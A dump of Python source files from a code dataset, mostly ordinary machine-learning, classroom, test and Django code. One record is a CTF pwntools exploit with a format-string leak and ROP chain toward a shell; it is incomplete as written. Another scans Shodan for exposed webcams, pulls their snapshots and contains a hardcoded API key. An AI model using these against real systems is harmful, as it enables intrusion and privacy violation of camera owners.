+{"seq_id":"600562568","text":"import numpy as np\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_csv(\"bill_authentication.csv\")\r\n\"\"\"\r\nprint(df)\r\nprint(df.shape)\r\nprint(df.size)\r\nprint(df.columns)\r\nprint(df.info())\r\nprint(df.head())\r\n\"\"\"\r\n\r\n\r\nX = df.iloc[:,:4].values\r\nY = df.iloc[:,4].values\r\n\r\n\"\"\"\r\nprint(X)\r\nprint(Y)\r\nprint(type(X))\r\nprint(type(Y))\r\nprint(X.shape)\r\nprint(Y.shape)\r\n\"\"\"\r\nfrom collections import  Counter\r\nprint(Counter(Y))\r\nprint(np.unique(Y))\r\nprint(df['Class'].value_counts())\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size = 0.2,random_state=65)\r\n\r\n\"\"\"\r\nprint(X_train)\r\nprint(X_test)\r\nprint(Y_train)\r\nprint(Y_test)\r\nprint(X_train.size)\r\nprint(X_train.shape)\r\nprint(Y_train.size)\r\nprint(Y_train.shape)\r\nprint(X_test.size)\r\nprint(X_test.shape)\r\nprint(Y_test.size)\r\nprint(Y_test.shape)\r\n\"\"\"\r\n\r\nfrom sklearn.preprocessing  import StandardScaler\r\nscaler = StandardScaler()\r\nX_train = scaler.fit_transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion='entropy')\r\nprint(model.fit(X_train,Y_train))\r\n\r\n\r\n\r\n#Testing predictions\r\nypred = model.predict(X_test)\r\nprint(ypred)\r\n\r\ncompare = pd.DataFrame({'Actual':Y_test,'Predict':ypred})\r\nprint(compare)\r\n\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nprint(confusion_matrix(Y_test,ypred))\r\n\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(Y_test,ypred))\r\n\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Accuracy Score : \",accuracy_score(Y_test,ypred))\r\n\r\n\r\nprint(df.head(2))\r\n#Dynamically Testing\r\nn1 = float(input(\"Enter a Variance no :\"))\r\nn2 = float(input(\"Enter a skewness no :\"))\r\nn3 = float(input(\"Enter a curtosis no :\"))\r\nn4 = float(input(\"Enter a Entropy no :\"))\r\n\r\n\r\ninputs = scaler.transform([[n1,n2,n3,n4]])\r\nresult = model.predict(inputs)\r\nprint(result)","sub_path":"decision.py","file_name":"decision.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"439751979","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\ng = nx.Graph()\ng.add_edges_from([(1,2), (2,3), (2,4), (3,4)])\n\nd = nx.degree(g)\n\nnx.draw(g, nodelist=d.keys(), node_size=[v * 100 for v in d.values()])\nplt.show()\n","sub_path":"dmtwitter/lib/testenx.py","file_name":"testenx.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"34885689","text":"from __future__ import print_function # must be first in file\nimport random\n\ndef food_id(food):\n    ''' Returns categorization of food\n\n    food is a string\n    returns a string of categories\n    '''\n    # The data\n    fruits = ['apple', 'banana', 'orange']\n    citrus = ['orange']\n    starchy = ['banana', 'potato']\n\n    # Check the category and report\n    if food in fruits:\n        if food in citrus:\n            return 'Citrus, Fruit'\n        else:\n            return 'NOT Citrus, Fruit'\n    else:\n        if food in starchy:\n            return 'Starchy, NOT Fruit'\n        else:\n            return 'NOT Starchy, NOT Fruit'\n\ndef food_id_test():\n    ''' Unit test for food_id\n        returns True if good, returns False and prints error if not\n        good\n        '''\n    works = True\n    if food_id('orange') != 'Citrus, Fruit':\n        works = False\n        print('orange bug in food id()')\n\n    if food_id('banana') != 'NOT Citrus, Fruit':\n        works = False\n        print('banana bug in food_id()')\n        # Add tests so that all lines of code are visited during test\n\n    if food_id('potato') != 'Starchy, NOT Fruit':\n        works = False\n        print(\"potato bug found in food_id()\")\n\n    if food_id('carrot') != 'NOT Starchy, NOT Fruit':\n        works = False\n        print(\"carrot bug found in food_id()\")\n\n    if works:\n        print('food_id passed all tests')\n        return works\n\n#PLTW told us to make a function 'f(x)' but its flowchart refers to the variable being tested as 'n'.\n#I am going to choose to interpret that as the following code.\ndef f(x):\n    if int(x) == x:\n        if x % 2 == 0:\n            if x % 3 == 0:\n                print(\"x is a multiple of 6\")\n            else:\n                print(\"x is even\")\n        else:\n            print(\"x is odd\")\n\n    else:\n        print(\"x is not an integer\")\n\ndef guess_once():\n    secret = random.randint(1, 4)\n    print('I have a number between 1 and 4.')\n    guess = int(input('Guess: '))\n    if guess < secret:\n        print(\"Too low - my number was\", secret, '!')\n    elif guess > secret:\n        print(\"Too high - my number was\", secret, '!')\n    else:\n        print('Right, my number is', guess, '!')\n\ndef quiz_decimal(low, high):\n    userInput = float(input(\"Type a number between \" + str(low) + \" and \" + str(high)))\n\n    if userInput > high:\n        print(\"No, \", userInput, \"is too high!\")\n    elif userInput < low:\n        print(\"No,\", userInput, \"is too low!\")\n    else:\n        print(\"Good!\", low, '<', userInput, '<', high)\n","sub_path":"CSP/1_3_4/1_3_4.py","file_name":"1_3_4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"394460978","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nprint('test')\npages_to_delete = [0] # page numbering starts from 0\ninfile = PdfFileReader('2.File.pdf', 'rb')\noutput = PdfFileWriter()\n\nfor i in range(infile.getNumPages()):\n    if i not in pages_to_delete:\n        p = infile.getPage(i)\n        output.addPage(p)\n\nwith open('newfile.pdf', 'wb') as f:\n    output.write(f)","sub_path":"DeletePage.py","file_name":"DeletePage.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"549539426","text":"\"\"\"\nDate:16/04/2021\n1125. Smallest Sufficient Team - Leetcode Hard\n\nThe following problem is solved using Sets and backtracking\n\"\"\"\nclass Solution:\n    def smallestSufficientTeam(self, req_skills: List[str], people: List[List[str]]) -> List[int]:\n        \n        for i in range(len(people)):\n            people[i]=set(people[i])\n        \n        for i in range(len(people)):\n            for j in range(len(people)):\n                if i!=j and people[i].issubset(people[j]):\n                    people[i]=set()\n        \n        skill_to_person={}\n        \n        for i in range(len(people)):\n            for skill in people[i]:\n                if skill not in skill_to_person:\n                    skill_to_person[skill]=set()\n                skill_to_person[skill].add(i)\n                \n        \n        \n        unmet_skills=set(req_skills)\n        Best_Team=[]\n        Team=[]\n        Min_Team=100000000\n        def meet_skill(skill=0):\n            nonlocal unmet_skills,Best_Team,Team,Min_Team\n            if not unmet_skills:\n                if Min_Team>len(Team):\n                    Best_Team=Team[::]\n                    Min_Team=len(Team)\n                return\n            \n            if req_skills[skill] not in unmet_skills:\n                meet_skill(skill+1)\n                return\n            \n            for person in skill_to_person[req_skills[skill]]:\n                \n                skill_to_add=unmet_skills.intersection(people[person])\n                unmet_skills-=skill_to_add\n                Team.append(person)\n                meet_skill(skill+1)\n                Team.pop()\n                unmet_skills=unmet_skills.union(skill_to_add)\n                \n                    \n    \n        \n        meet_skill()\n        return Best_Team\n        \n        \n        \n        \n        ","sub_path":"Hashing/Smallest_Sufficient_Team.py","file_name":"Smallest_Sufficient_Team.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"16800439","text":"import os\nimport shodan\nimport requests\nimport socket\nimport urllib\nfrom PIL import Image, ImageEnhance\nfrom rich import print\nfrom clarifai.rest import ClarifaiApp\n\nclass Scanner(object):\n    def __init__(self):\n        socket.setdefaulttimeout(5)\n        self.SHODAN_API_KEY = os.environ.get(\"SHODAN_API_KEY\")\n        assert self.SHODAN_API_KEY != \"\"\n        self.api = shodan.Shodan(self.SHODAN_API_KEY)\n        # preset url schemes\n        self.default_url_scheme = \"[link=http://{ip}:{port}][i][green]{ip}[/green]:[red]{port}[/red][/link]\"\n        self.MJPG_url_scheme = \"[link=http://{ip}:{port}/?action=stream][i]http://[green]{ip}[/green]:[red]{port}[/red]\" \\\n                               \"[blue]/?action=stream[/blue][/link]\"\n        self.clarifai_initialized = False\n\n    def init_clarifai(self):\n        self.CLARIFAI_API_KEY = os.environ.get(\"CLARIFAI_API_KEY\")\n        assert self.CLARIFAI_API_KEY != \"\"\n        self.clarifai_app = ClarifaiApp(api_key='ac61aa2283a04f54bffb59bbae86206e')\n        self.clarifai_model = self.clarifai_app.public_models.general_model\n        self.clarifai_initialized = True\n\n    def tag_image(self,url):\n        response = self.clarifai_model.predict_by_url(url=url)\n        results = [concept['name'] for concept in response['outputs'][0]['data']['concepts']]\n        return results\n\n    def check_empty(self,image_source,tolerance=5)->bool:\n        im_loc = \".tmpimage\"\n        urllib.request.urlretrieve(image_source, im_loc)\n        im = Image.open(im_loc)\n        extrema = im.convert(\"L\").getextrema()\n        if abs(extrema[0]-extrema[1]) <= tolerance:\n            return False\n        return True\n\n    def scan(self, camera_type, url_scheme = '', check_empty_url='',check_empty = True, tag=False):\n        if url_scheme == '':\n            url_scheme = self.default_url_scheme\n\n        if tag and (not self.clarifai_initialized):\n            self.init_clarifai()\n\n        results = self.api.search(\"webcams\")\n        max_time = len(results[\"matches\"])*10\n        print(f\"maximum time:{max_time} seconds\")\n        for result in results[\"matches\"]:\n            if camera_type in result[\"data\"]:\n                url = f\"http://{result['ip_str']}:{result['port']}\"\n                try:\n                    r = requests.get(url, timeout=5)\n                    if r.status_code == 200:\n                        if check_empty == False:\n                            print(\n                                url_scheme.format(ip=result['ip_str'], port=result['port'])\n                            )\n                            continue\n                        if self.check_empty(check_empty_url.format(url=url)):\n                            print(\n                                url_scheme.format(ip=result['ip_str'], port=result['port'])\n                            )\n                            if tag:\n                                for t in self.tag_image(check_empty_url.format(url=url)):\n                                    print(f\"[green]{t}[/green]\",end=\" \")\n                                print()\n                except:\n                    continue\n\n    def MJPG(self,check,tag):\n        scheme = self.MJPG_url_scheme\n        if check:\n            self.scan(\"MJPG-streamer\", url_scheme=scheme, check_empty_url=\"{url}/?action=snapshot\",tag=tag)\n        else:\n            self.scan(\"MJPG-streamer\", url_scheme=scheme, check_empty_url=\"{url}/?action=snapshot\",tag=tag)\n\n    def webcamXP(self,check,tag):\n        if check:\n            self.scan(\"webcamXP\", check_empty_url='{url}/cam_1.jpg', tag=tag)\n        else:\n            self.scan(\"webcamXP\",check_empty_url='{url}/cam_1.jpg',tag=tag)","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"360566347","text":"from tool.runners.python import SubmissionPy\nfrom collections import defaultdict\n\n\nclass YouyounSubmission(SubmissionPy):\n\n    def run(self, s):\n        \"\"\"\n        :param s: input in string format\n        :return: solution flag\n        \"\"\"\n        mem = defaultdict(list)\n        turn = 1\n        init = s.splitlines()[0].split(',')\n        while turn <= len(init):\n            last_spoken = int(init[turn - 1])\n            mem[last_spoken].append(turn)\n            turn += 1\n        while turn < 30000001:\n            if len(mem[last_spoken]) >= 2:\n                last_spoken = mem[last_spoken][-1] - mem[last_spoken][-2]\n            else:\n                last_spoken = 0\n            mem[last_spoken].append(turn)\n            turn += 1\n        return last_spoken\n\n\nif __name__ == '__main__':\n    print(YouyounSubmission().run(open('../input/youyoun.txt').read()))\n","sub_path":"day-15/part-2/youyoun.py","file_name":"youyoun.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"45055148","text":"from pwn import *\n\nlibc_offset = 0x1eb723\npie_offset = 0x1570 \nret_offset = 0x1525\nmain_offset = 0x1526\n\npop_rdi_offset = 0x015d3\n\nbinsh_offset = 0x1b6613\nsystem_offset = 0x49a50\nsystem_offset = 0x554e0\nexit_offset = 0x3f090\nexit_offset = 0xe5fb0\n\nflag = \"SCG{NOW_GET_VOLDEMORT}\"\n#all addresses up to 49\nleak = \"AAAA %1$lp %3$lp %8$lp %39$lp %40$lp %42$lp %44$lp %45$lp %47$lp BBBB\"\nspell = \"Expelliarmus\\x00\"\n\n#p = remote(\"172.17.0.4\",1024)\n#p = remote(\"hax1.allesctf.net\",9102)\np = process(\"./pwn3\")\n\nprint(p.recvline())\np.sendline(flag)\nprint(p.recvuntil(\"name:\"))\np.sendline(leak)\ntmp = p.recvuntil(\"spell:\")\n\nprint(tmp.split())\n\npad = cyclic(0xff+0xf)\ntmp = tmp.split()\nIOstdout = int(tmp[-14],16) - 131 #offset 0x1eb6a0\nGIlibcwrite = int(tmp[-13],16) - 23 #offset 0x111300\nlibcstartmain = int(tmp[-7],16) - 243 #offset 0x270f0\nlog.info(\"Stack Canary: {}\".format(tmp[4]))\nlog.info(\"<_IO_2_1_stdout_>@libc: {}\".format(hex(IOstdout)))\nlog.info(\"<__GI___libc_write>@libc: {}\".format(hex(GIlibcwrite)))\nlog.info(\"<__libc_start_main>@libc: {}\".format(hex(libcstartmain)))\n\nraw_input(\"Exploit ?\")\nidx = cyclic_find(\"cnaacoaa\")\n\nprint(p.clean()) # clean socket buffer (read all and print)\np.sendline(spell+pad[:idx]+p64(canary)+\"BBBBBBBB\"+p64(pop_rdi)+p64(LIBC_START_MAIN)+p64(PUTS)+p64(MAIN))\nprint(p.recvline())\n#p.sendline(spell+pad[:idx]+p64(canary)+\"BBBBBBBB\"+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))\n#p.sendline(spell+pad[:idx]+p64(canary)+p64(exit)+p64(ret)+p64(pop_rdi)+p64(system)+p64(exit)+p64(bin_sh))#+p64(system))\n#p.interactive()\np.clean()\np.close()\n\n'''\nREMOTe\n[*] <_IO_2_1_stdout_>@libc: 0x7fc73035b6a0\n[*] <__GI___libc_write>@libc: 0x7fc730281300\n[*] <__libc_start_main>@libc: 0x7fc7301970f0\n\nLOCAL\n[*] <_IO_2_1_stdout_>@libc: 0x7fc73035b6a0\n[*] <__GI___libc_write>@libc: 0x7fc730281300\n[*] <__libc_start_main>@libc: 0x7fc7301970f0\n'''","sub_path":"cscg/pwn/pwn3/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"623743327","text":"import os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef main():\n    list = db.execute(\"SELECT * FROM books JOIN authors ON authors.id = books.author_id\").fetchall()\n    for row in list:\n        print(f\"{row.isbn} - {row.title} - {row.author} - {row.year}\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"411227030","text":"# Copyright 2013 Canonical Ltd.\n# All Rights Reserved.\n#\n#    Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n#    not use this file except in compliance with the License. You may obtain\n#    a copy of the License at\n#\n#         http://www.apache.org/licenses/LICENSE-2.0\n#\n#    Unless required by applicable law or agreed to in writing, software\n#    distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n#    License for the specific language governing permissions and limitations\n#    under the License.\n\"\"\" Tests for create_volume TaskFlow \"\"\"\n\nimport mock\n\nfrom cinder import context\nfrom cinder import exception\nfrom cinder import test\nfrom cinder.tests.unit import fake_consistencygroup\nfrom cinder.tests.unit import fake_snapshot\nfrom cinder.tests.unit import fake_volume\nfrom cinder.tests.unit.volume.flows import fake_volume_api\nfrom cinder.volume.flows.api import create_volume\nfrom cinder.volume.flows.manager import create_volume as create_volume_manager\n\n\nclass CreateVolumeFlowTestCase(test.TestCase):\n\n    def time_inc(self):\n        self.counter += 1\n        return self.counter\n\n    def setUp(self):\n        super(CreateVolumeFlowTestCase, self).setUp()\n        self.ctxt = context.get_admin_context()\n        self.counter = float(0)\n\n        # Ensure that time.time() always returns more than the last time it was\n        # called to avoid div by zero errors.\n        self.counter = float(0)\n\n    @mock.patch('time.time', side_effect=time_inc)\n    @mock.patch('cinder.objects.ConsistencyGroup.get_by_id')\n    def test_cast_create_volume(self, consistencygroup_get_by_id, mock_time):\n        props = {}\n        consistencygroup_obj = \\\n            fake_consistencygroup.fake_consistencyobject_obj(\n                self.ctxt, consistencygroup_id=1, host=None)\n        consistencygroup_get_by_id.return_value = consistencygroup_obj\n        spec = {'volume_id': None,\n                'source_volid': None,\n                'snapshot_id': None,\n                'image_id': None,\n                'source_replicaid': None,\n                'consistencygroup_id': None,\n                'cgsnapshot_id': None}\n\n        # Fake objects assert specs\n        task = create_volume.VolumeCastTask(\n            fake_volume_api.FakeSchedulerRpcAPI(spec, self),\n            fake_volume_api.FakeVolumeAPI(spec, self),\n            fake_volume_api.FakeDb())\n\n        task._cast_create_volume(self.ctxt, spec, props)\n\n        spec = {'volume_id': 1,\n                'source_volid': 2,\n                'snapshot_id': 3,\n                'image_id': 4,\n                'source_replicaid': 5,\n                'consistencygroup_id': 5,\n                'cgsnapshot_id': None}\n\n        # Fake objects assert specs\n        task = create_volume.VolumeCastTask(\n            fake_volume_api.FakeSchedulerRpcAPI(spec, self),\n            fake_volume_api.FakeVolumeAPI(spec, self),\n            fake_volume_api.FakeDb())\n\n        task._cast_create_volume(self.ctxt, spec, props)\n        consistencygroup_get_by_id.assert_called_once_with(self.ctxt, 5)\n\n\nclass CreateVolumeFlowManagerTestCase(test.TestCase):\n\n    def setUp(self):\n        super(CreateVolumeFlowManagerTestCase, self).setUp()\n        self.ctxt = context.get_admin_context()\n\n    @mock.patch('cinder.volume.flows.manager.create_volume.'\n                'CreateVolumeFromSpecTask.'\n                '_handle_bootable_volume_glance_meta')\n    @mock.patch('cinder.objects.Snapshot.get_by_id')\n    def test_create_from_snapshot(self, snapshot_get_by_id, handle_bootable):\n        fake_db = mock.MagicMock()\n        fake_driver = mock.MagicMock()\n        fake_manager = create_volume_manager.CreateVolumeFromSpecTask(\n            fake_db, fake_driver)\n        volume = fake_volume.fake_db_volume()\n        orig_volume_db = mock.MagicMock(id=10, bootable=True)\n        snapshot_obj = fake_snapshot.fake_snapshot_obj(self.ctxt)\n        snapshot_get_by_id.return_value = snapshot_obj\n        fake_db.volume_get.return_value = orig_volume_db\n\n        fake_manager._create_from_snapshot(self.ctxt, volume,\n                                           snapshot_obj.id)\n        fake_driver.create_volume_from_snapshot.assert_called_once_with(\n            volume, snapshot_obj)\n        fake_db.volume_get.assert_called_once_with(self.ctxt,\n                                                   snapshot_obj.volume_id)\n        handle_bootable.assert_called_once_with(self.ctxt, volume['id'],\n                                                snapshot_id=snapshot_obj.id)\n\n    @mock.patch('cinder.objects.Snapshot.get_by_id')\n    def test_create_from_snapshot_update_failure(self, snapshot_get_by_id):\n        fake_db = mock.MagicMock()\n        fake_driver = mock.MagicMock()\n        fake_manager = create_volume_manager.CreateVolumeFromSpecTask(\n            fake_db, fake_driver)\n        volume = fake_volume.fake_db_volume()\n        snapshot_obj = fake_snapshot.fake_snapshot_obj(self.ctxt)\n        snapshot_get_by_id.return_value = snapshot_obj\n        fake_db.volume_get.side_effect = exception.CinderException\n\n        self.assertRaises(exception.MetadataUpdateFailure,\n                          fake_manager._create_from_snapshot, self.ctxt,\n                          volume, snapshot_obj.id)\n        fake_driver.create_volume_from_snapshot.assert_called_once_with(\n            volume, snapshot_obj)\n","sub_path":"cinder/tests/unit/volume/flows/test_create_volume_flow.py","file_name":"test_create_volume_flow.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"620354303","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os\nimport sys\nimport time\nimport unittest\nimport tarfile\n\n# Pick a unique port for this user\nPORT = str(50000+int(os.getenv('SSH_TTY').split('/')[3]))\n\ndef run(cmd):\n    \"\"\"Run a command with given parameters return the return code, stdout and stderr\"\"\"\n    result = subprocess.run(\n        cmd,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE)\n    out = result.stdout.decode('utf-8')\n    err = result.stderr.decode('utf-8')\n    return result.returncode, out, err\n\n\n    def runin(cmd, stdin):\n        \"\"\"Run a command with given parameters and given input return the return code\"\"\"\n        result = subprocess.Popen(cmd,stdin=subprocess.PIPE)\n        result.wait()\n        return result.returncode\n\n\n    def run_server():\n        \"\"\"Run the server\"\"\"\n        pid = subprocess.Popen([\"./server\", \"-p\", PORT]).pid\n        # Give the server time to start\n        time.sleep(0.1)\n        return pid\n\n\n    def kill_server(pid):\n        \"\"\"kill the server\"\"\"\n        subprocess.run([\"kill\", str(pid)])\n\n\nclass TestCases(unittest.TestCase):\n\n    def setUp(self):\n        \"\"\"Run before every test\"\"\"\n        print(\"setUp()\", os.path.exists('./testdatas'))\n        if not os.path.exists('./testdatas'):\n            print('Creating server test data directory')\n            os.mkdir('./testdatas')\n        if not os.path.exists('./testdatac'):\n            print('Creating client test data directory')\n            os.mkdir('./testdatac')\n        if os.path.exists('testdata.tar'):\n            print('Extracting test data')\n            tar = tarfile.open('testdata.tar')\n            tar.extractall()\n            tar.close()\n        else:\n            print('No testdata.tar file found!', file=sys.stderr)\n\n    def tearDown(self):\n        \"\"\"Run after every test\"\"\"\n        pass\n\n    def test_nothing(self):\n        pass\n\n    def test_server_no_port(self):\n        \"\"\"Verify the server error when no port\"\"\"\n        (code, out, err) = run([\"./server\"]);\n        self.assertEqual(code, 1)\n\n    def test_client_no_host(self):\n        \"\"\"Verify the client error when no port\"\"\"\n        (code, out, err) = run([\"./client\", \"-p\",\"12345\", \"hello.txt\"]);\n        self.assertEqual(code, 1)\n\n    def test_client_no_port(self):\n        \"\"\"Verify the client error when no port\"\"\"\n        (code, out, err) = run([\"./client\", \"-h\",\"localhost\", \"hello.txt\"]);\n        self.assertEqual(code, 1)\n\n#    def test_first_server_test(self):\n#        \"\"\"Verify the server outputs are as expected\"\"\"\n#        (code, out, err) = run([\"./server\", \"-p\", \"12345\"]);\n#        self.assertEqual(code, 0)\n#        self.assertEqual(out, 'PORT: 12345\\n')\n#        self.assertEqual(err, '')\n#\n#    def test_first_client_test(self):\n#        \"\"\"Verify the client outputs are as expected\"\"\"\n#        (code, out, err) = run([\"./client\", \"-h\",\"localhost\", \"-p\",\"12345\", \"hello.txt\"]);\n#        self.assertEqual(code, 0)\n#        self.assertEqual(out, 'HOST: localhost PORT: 12345 hello.txt\\n')\n#        self.assertEqual(err, '')\n#\n#    def test_first_client_server(self):\n#        pid = run_server()\n#        code = runin([\"./client\", \"-p\", PORT, \"-h\", \"localhost\"], \"quit\\n\")\n#        self.assertEqual(code, 0)\n#        kill_server(pid)\n\n\nif __name__ == '__main__':\n    print(\"Port:\",PORT)\n    unittest.main()\n","sub_path":"cst-240-Unix/Lab6/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"75968700","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom product.models import Product, Category\nfrom django.template.defaultfilters import slugify\n\n# Create your models here.\n\n\ndef get_file_path(instance, filename):\n    return \"files/auraai/\" + str(instance.id) + \"_\" + filename\n\n\ndef f(instance, filename):\n    return \"files/tag/banner\" + filename\n\n\nclass UserImage(models.Model):\n    FOCUS_ON = (\n        (\"TOP\", \"top\"),\n        (\"BOTTOM\", \"bottom\"),\n        (\"WHOLE\", \"whole\")\n    )\n    url = models.URLField(max_length=2000, blank=True)\n    imported_from = models.CharField(max_length=200, blank=True)\n    uploader = models.ForeignKey(User, blank=True, null=True)\n    upload_date = models.DateField(auto_now=False, auto_now_add=True)\n    image_for = models.CharField(\n        max_length=60, blank=True, choices=FOCUS_ON, default=FOCUS_ON[2])\n    active = models.BooleanField(default=True)\n    likes_top = models.IntegerField(default=0)\n    likes_bottom = models.IntegerField(default=0)\n    likes_whole = models.IntegerField(default=0)\n    dislike = models.IntegerField(default=0)\n    priority = models.IntegerField(default=0)\n    riplicable = models.BooleanField(default=True)\n    photo = models.ImageField(upload_to=get_file_path, blank=True, null=True)\n    relevent = models.BooleanField(default=True)\n\n\nclass UserPhysique(models.Model):\n    BODY_TYPE_CHOICE = (\n        (\"AVERAGE\", \"average\"),\n        (\"EXTRA\", \"extra\"),\n        (\"ATHLETIC\", \"athletic\"),\n        (\"SLIM\", \"slim\"),\n        (\"BIG&BOLD\", \"big&bold\"),\n        (\"MUSCULAR\", \"muscular\")\n    )\n    HAIR_COLOR_CHOICE = (\n        (\"BLACK\", \"black\"),\n        (\"BROWN\", \"brown\"),\n        (\"GREEN\", \"green\"),\n        (\"BLUE\", \"BLUE\"),\n        (\"GREY\", \"grey\"),\n        (\"HAZEL\", \"hazel\")\n    )\n    EYE_COLOR_CHOICE = (\n        (\"BLACK\", \"black\"),\n        (\"BROWN\", \"brown\"),\n        (\"RED\", \"red\"),\n        (\"BLOND\", \"blond\"),\n        (\"GREY\", \"grey\"),\n        (\"WHITE\", \"white\"),\n        (\"SHAVED\", \"shaved\"),\n        (\"DYED\", \"dyed\"),\n        (\"BULD\", \"buld\")\n    )\n    GENDER_CHOICE = (\n        (\"MALE\", \"male\"),\n        (\"FEMALE\", \"female\"),\n        (\"OTHER\", \"other\")\n    )\n    user = models.ForeignKey(User, blank=True, null=True)\n    create_date = models.DateField(auto_now=False, auto_now_add=True)\n    height = models.IntegerField(default=0)\n    weight = models.IntegerField(default=0)\n    body_type = models.CharField(\n        max_length=60, blank=True, choices=BODY_TYPE_CHOICE, default=BODY_TYPE_CHOICE[0])\n    hair_color = models.CharField(\n        max_length=60, blank=True, choices=HAIR_COLOR_CHOICE, default=HAIR_COLOR_CHOICE[0])\n    eye_color = models.CharField(\n        max_length=60, blank=True, choices=EYE_COLOR_CHOICE, default=EYE_COLOR_CHOICE[0])\n    gender = models.CharField(\n        max_length=20, blank=True, choices=GENDER_CHOICE, default=GENDER_CHOICE[0])\n    age = models.IntegerField(default=1)\n\n\nclass UserFbLikes(models.Model):\n    user = models.ForeignKey(User, blank=False, null=False)\n    fb_page = models.CharField(max_length=300, blank=True)\n    page_id = models.CharField(max_length=30, blank=True)\n\n\nclass UserFbDetails(models.Model):\n    user = models.ForeignKey(User, blank=False, null=False)\n    user_email = models.EmailField(max_length=260, blank=True)\n    fb_id = models.CharField(max_length=30, blank=True)\n    token = models.CharField(max_length=300, blank=True)\n\n\nclass Tag(models.Model):\n    category = models.ForeignKey(Category)\n    tag = models.CharField(max_length=150, blank=False)\n\n    def __str__(self):\n        return self.tag\n\n    def __unicode__(self):\n        return self.tag\n\n\nclass ProductTagMap(models.Model):\n    product = models.ForeignKey(Product)\n    tag = models.ForeignKey(Tag)\n\n    def __str__(self):\n        return str(self.product) + '-' + str(self.tag)\n\n    def __unicode__(self):\n        return str(self.product) + '-' + str(self.tag)\n\n\nclass TagBanner(models.Model):\n    banner_name = models.CharField(max_length=50, blank=False)\n    tags = models.ManyToManyField(Tag)\n    active = models.BooleanField(default=True)\n    slug = models.SlugField(max_length=200, blank=True, null=True)\n    banner_image = models.ImageField(upload_to=f,\n                                     default='uploads/blogimages/dummy.jpg',\n                                     blank=True,\n                                     null=True)\n\n    def save(self, *args, **kwargs):\n        if not self.slug:\n            self.slug = slugify(self.banner_name)\n        super(TagBanner, self).save(*args, **kwargs)\n\n    def __str__(self):\n        return self.banner_name + str(' Active' if self.active else ' Deactive')\n\n    def __unicode__(self):\n        return self.banner_name + str(' Active' if self.active else ' Deactive')\n","sub_path":"auraai/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"76269960","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar  9 22:50:40 2017\n\n@author: sthar\n\"\"\"\n\n__author__ = 'Bharat'\nfrom skimage.segmentation import slic\nfrom skimage import io\nimport numpy as np\nimport time\nimport os\n\n\n########### PARAMETER DEFINITION #############\nrgb_dir = '..\\dataset\\CITYSCAPE\\RGB\\\\' # Location of folder containing the RGB images of the dataset\nSLIC_dir = '..\\dataset\\CITYSCAPE\\SLIC\\\\'\n\nlist_start = 1001\nlist_end = 1499\n\nnumSegments = 2000\n\nsigma = 2  # Sigma value of Gaussian Smoothening Applied before SLIC\n\n############################################\n\n#### Main Part of Program START ###########\n\nprint('Starting SLIC with List no {0} until {1}'.format(list_start, list_end))\n\nstart_time = time.time()\n\n# Get List of RGB Image files from directory (relative location)\nlist_files = os.listdir(rgb_dir)\nlist_files.sort()\n\nfor im_no in range(list_start, list_end+1):\n    image = io.imread(rgb_dir+list_files[im_no])\n    segments = slic(image, n_segments = numSegments, sigma = sigma)\n    np.save(SLIC_dir + list_files[im_no].rsplit(\".\",1)[0] + '.npy',segments)\n    print(im_no)\n\nend_time = time.time()\n\nprint('{0} Files Processed. Time Taken: {1}'.format(list_end-list_start+1, 